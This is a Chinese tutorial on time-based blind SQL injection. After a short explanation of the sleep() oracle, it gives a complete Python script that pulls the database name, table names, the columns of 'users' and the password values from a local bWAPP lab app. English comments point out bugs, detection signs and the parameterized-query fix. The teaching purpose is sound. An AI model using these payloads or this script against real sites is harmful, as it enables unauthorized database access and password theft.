Web安全(二)SQL注入[三]
时间盲注
原理
select * from user where id = '?'
? 为用户输入,替换为 4' and sleep(3) -- '
实际上执行的SQL语句:
select * from user where id = '4' and sleep(3) -- ''
当id=4存在时,休眠3秒
当id=4不存在时,and前面的条件为假,整个条件已经确定为假,后面的sleep(3)不会被执行,语句直接返回;只有前面的条件为真时,才会执行到最后的sleep(3)。
常用函数
substr(a,b,c):从第b个位置开始,截取字符串a中长度为c的子串
count():计算总数
ascii():返回字符的ASCII码
length():返回字符串的长度
left(a,b):从左往右截取字符串a的前b个字符
sleep(n):将程序暂停n秒
示例
选择时间盲注
正常输入时可看到响应时间约为1秒;拼接sleep函数后响应时间明显变长,说明存在时间盲注。注意and前面的条件必须在数据库中为真(即记录存在),否则and后面的语句不会被执行。
python脚本
import requests
from urllib.parse import quote
# Fixed request headers sent with every probe below.
# The Referer and Cookie values are the author's local bWAPP lab session
# (127.0.0.1): security_level=0 is presumably bWAPP's lowest setting and
# PHPSESSID is that session's id -- they are page-specific lab values, not
# anything reusable.
# Defender's note: every probe in this script hits the same URL with a
# title parameter containing `and if(...sleep(...)...)#`; responses cluster at
# the sleep() duration. Those two traits (repetitive near-identical requests
# that differ in one number, and a fixed response-time step) are what WAF
# rules and log review key on; the server-side fix is a parameterized query.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',
    'Referer': 'http://127.0.0.1/bwapp/bwapp/sqli_15.php',
    'Cookie': 'security_level=0; PHPSESSID=hlk1q0q4m2qn6d8rtnhcs0gr65'
}
def guset_db_len():
    """Infer the length of the current database name from response delay.

    Tries lengths 1..5. Each probe asks the server to sleep(3) only when
    length(database()) equals the candidate, so a slow response is the "yes"
    signal. Returns the last length that produced a slow response (0 if none).

    NOTE(review): the name looks like a typo of guess_db_len; __main__ never
    calls it and passes a hard-coded 5 to guest_db_name instead.
    """
    len_of_db = 0
    print('猜解数据库长度')
    for i in range(1, 6):
        url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
        # The closing quote ends the literal the app built; `#` comments out
        # whatever the application appends after the injected value.
        title = '''Man of Steel' and if(length(database())=%s,sleep(3),1)#''' % i
        title = quote(title)
        url = url + title
        r = requests.get(url, headers=headers)
        # r.elapsed is the time between sending the request and the server's
        # response arriving. NOTE(review): requests documents it as the time
        # until the response headers are parsed, not until the last body byte.
        # .seconds is the whole-seconds component of that timedelta (an int),
        # so the comparison fires only for round trips of 3 full seconds or
        # more -- a slow network or loaded lab VM produces false positives.
        if (r.elapsed.seconds > 2.5):
            print('length of database:', i)
            len_of_db = i
            # No break: remaining candidates are still sent, and len_of_db
            # keeps the last match, not the first.
            continue
    return len_of_db
def guest_db_name(len_of_db):
    """Recover the database name one character at a time from response delay.

    For each position 1..len_of_db every character in char_list is tried;
    the server is asked to sleep(5) only when ascii(mid(database(),i,1))
    equals the candidate. A matching character is appended to name_db and
    printed; the assembled name is printed at the end. Nothing is returned.

    Only ASCII letters are tried: a position whose real character is not in
    char_list yields no match and is silently skipped, so the printed name can
    be shorter than len_of_db. The inner loop is not broken on a match, so
    every candidate is sent for every position.
    """
    name_db = ''
    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    print('猜解数据库名称')
    for i in range(1, len_of_db + 1):
        for k in char_list:
            k1 = ord(k)  # unused; the payload below calls ord(k) directly
            url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
            title = '''Man of Steel' and if(ascii(mid(database(),%s,1))=%s,sleep(5),1)#''' % (i, ord(k))
            url = url + quote(title)
            r = requests.get(url, headers=headers)
            # .seconds is an int, so this means "at least 5 full seconds";
            # jitter above the threshold is read as a match.
            if (r.elapsed.seconds > 4.5):
                name_db = name_db + k
                print('第%s位:%s' % (i, k))
    print('name of database:', name_db)
def guest_table_name_len():
    """Recover the comma-joined list of table names in schema 'bWAPP'.

    Two phases, both using the sleep(5)-delay oracle:
      1. Try lengths 2..39 for length(group_concat(table_name)); the last
         length that produced a slow response is kept in len_of_tables.
      2. For each position 1..len_of_tables try every character in
         char_list (ASCII letters plus ',') and append each match.
    Results are printed; nothing is returned.

    The schema name 'bWAPP' is hard-coded in both payloads. NOTE(review): the
    phase-2 banner prints the database-name label ('猜解数据库名称'), which
    looks copied from guest_db_name; it is a runtime string, so it is left as
    is here.
    """
    len_of_tables = 0
    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,'
    tables_name = ''
    print('表长度的总和')
    for i in range(2, 40):
        url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
        title = '''Man of Steel' and if((select length(group_concat(table_name)) from information_schema.tables where table_schema='bWAPP')=%s,sleep(5),1)#''' % i
        title = quote(title)
        url = url + title
        r = requests.get(url, headers=headers)
        # r.elapsed is the time between sending the request and the server's
        # response arriving. NOTE(review): requests documents it as the time
        # until the response headers are parsed, not until the last body byte.
        # .seconds is the integer seconds component, so this fires for round
        # trips of 5 full seconds or more.
        if (r.elapsed.seconds > 4.5):
            print('length of tables:', i)
            len_of_tables = i
            # No break: the loop runs to 39 and keeps the last match.
            continue
    print('猜解数据库名称')
    for i in range(1, len_of_tables + 1):
        for k in char_list:
            k1 = ord(k)
            url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
            title = '''Man of Steel' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),%s,1))=%s,sleep(5),1)#''' % (
                i, k1)
            title = quote(title)
            url = url + title
            r = requests.get(url, headers=headers)
            # Not broken on a match: all candidates are sent for each position.
            if (r.elapsed.seconds > 4.5):
                tables_name = tables_name + k
                print('第%s位:%s' % (i, k))
    print('name of tables:', tables_name)
def guest_name_columns():
    """Recover the comma-joined list of column names of table 'users'.

    Same two-phase structure as guest_table_name_len, against
    information_schema.columns where table_name='users':
      1. Try lengths 2..199 for length(group_concat(column_name)); the last
         slow response sets len_of_columns.
      2. For each position 1..len_of_columns try every character in
         char_list (ASCII letters plus ',') and append each match.
    Results are printed; nothing is returned.

    The table name 'users' is hard-coded in both payloads. Characters outside
    char_list (e.g. '_') produce no match and are skipped, so the printed
    list can be shorter than len_of_columns.
    """
    len_of_columns = 0
    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,'
    columns_name = ''
    print('列长度的总和')
    for i in range(2, 200):
        url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
        title = '''Man of Steel' and if((select length(group_concat(column_name)) from information_schema.columns where table_name='users')=%s,sleep(5),1)#''' % i
        title = quote(title)
        url = url + title
        r = requests.get(url, headers=headers)
        # r.elapsed is the time between sending the request and the server's
        # response arriving. NOTE(review): requests documents it as the time
        # until the response headers are parsed, not until the last body byte.
        # .seconds is the integer seconds component, so this fires for round
        # trips of 5 full seconds or more.
        if (r.elapsed.seconds > 4.5):
            print('length of columns:', i)
            len_of_columns = i
            # No break: the loop runs to 199 and keeps the last match.
            continue
    print('猜解列名称')
    for i in range(1, len_of_columns + 1):
        for k in char_list:
            k1 = ord(k)
            url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
            title = '''Man of Steel' and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),%s,1))=%s,sleep(5),1)#''' % (
                i, k1)
            title = quote(title)
            url = url + title
            r = requests.get(url, headers=headers)
            # Not broken on a match: all candidates are sent for each position.
            if (r.elapsed.seconds > 4.5):
                columns_name = columns_name + k
                print('第%s位:%s' % (i, k))
    print('name of columns:', columns_name)
def guest_columns_content():
    """Recover the comma-joined values of one column of table 'users'.

    The column is fixed to 'password' by the local columns_name variable and
    is interpolated directly into the SQL text. Two phases, as in the other
    guess functions:
      1. Try lengths 2..399 for length(group_concat(<column>)); the last
         slow response sets len_columns_content.
      2. For each position 1..len_columns_content try every character in
         char_list (ASCII letters, ',' and digits) and append each match.
    Results are printed; nothing is returned.

    Because the first phase sends up to ~400 requests and each true match
    costs a 5-second server-side delay, this phase alone is slow and highly
    visible in access logs: one client, one URL, hundreds of requests that
    differ only in a number.
    """
    len_columns_content = 0
    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,1234567890'
    columns_content = ''
    columns_name = 'password'
    print('列内容长度的总和')
    for i in range(2, 400):
        url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
        title = '''Man of Steel' and if((select length(group_concat(%s)) from users)=%s,sleep(5),1)#''' % (
            columns_name, i)
        title = quote(title)
        url = url + title
        r = requests.get(url, headers=headers)
        # r.elapsed is the time between sending the request and the server's
        # response arriving. NOTE(review): requests documents it as the time
        # until the response headers are parsed, not until the last body byte.
        # .seconds is the integer seconds component, so this fires for round
        # trips of 5 full seconds or more.
        if (r.elapsed.seconds > 4.5):
            print('length of columns content:', i)
            len_columns_content = i
            # No break: the loop runs to 399 and keeps the last match.
            continue
    print('列的内容')
    for i in range(1, len_columns_content + 1):
        for k in char_list:
            k1 = ord(k)
            url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
            title = '''Man of Steel' and if(ascii(mid((select group_concat(%s) from users),%s,1))=%s,sleep(5),1)#''' % (
                columns_name, i, k1)
            title = quote(title)
            url = url + title
            r = requests.get(url, headers=headers)
            # Not broken on a match: all candidates are sent for each position.
            if (r.elapsed.seconds > 4.5):
                columns_content = columns_content + k
                print('第%s位:%s' % (i, k))
    print('columns_content:', columns_content)
# Script entry point: runs the four guess phases in sequence against the
# local lab URL. NOTE(review): the database-name length is passed as a
# hard-coded 5 rather than taken from guset_db_len(), which is never called.
if __name__ == '__main__':
    guest_db_name(5)
    guest_table_name_len()
    guest_name_columns()
    guest_columns_content()
参考:CSDN——Gond19